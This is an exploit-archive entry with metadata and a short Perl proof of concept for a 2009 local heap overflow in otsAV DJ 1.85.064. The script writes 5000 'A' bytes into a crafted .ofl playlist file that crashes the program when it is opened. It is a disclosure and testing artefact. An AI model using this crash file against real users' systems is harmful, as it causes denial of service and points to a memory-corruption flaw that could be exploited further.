otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)

Author: hack4love
type: dos
platform: windows
port: 
date_added: 2009-07-08  
date_updated:   
verified: 1  
codes: CVE-2009-3812;OSVDB-55747  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9090.pl  
#!/usr/bin/perl
# Found By :: HACK4LOVE
# all i want say welcom back 3asfh
# otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
# http://x.download.otszone.com/static/otsavdjtrialsetup.exe
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.OFL');
print myfile $crash;
########################################################################################

# milw0rm.com [2009-07-09]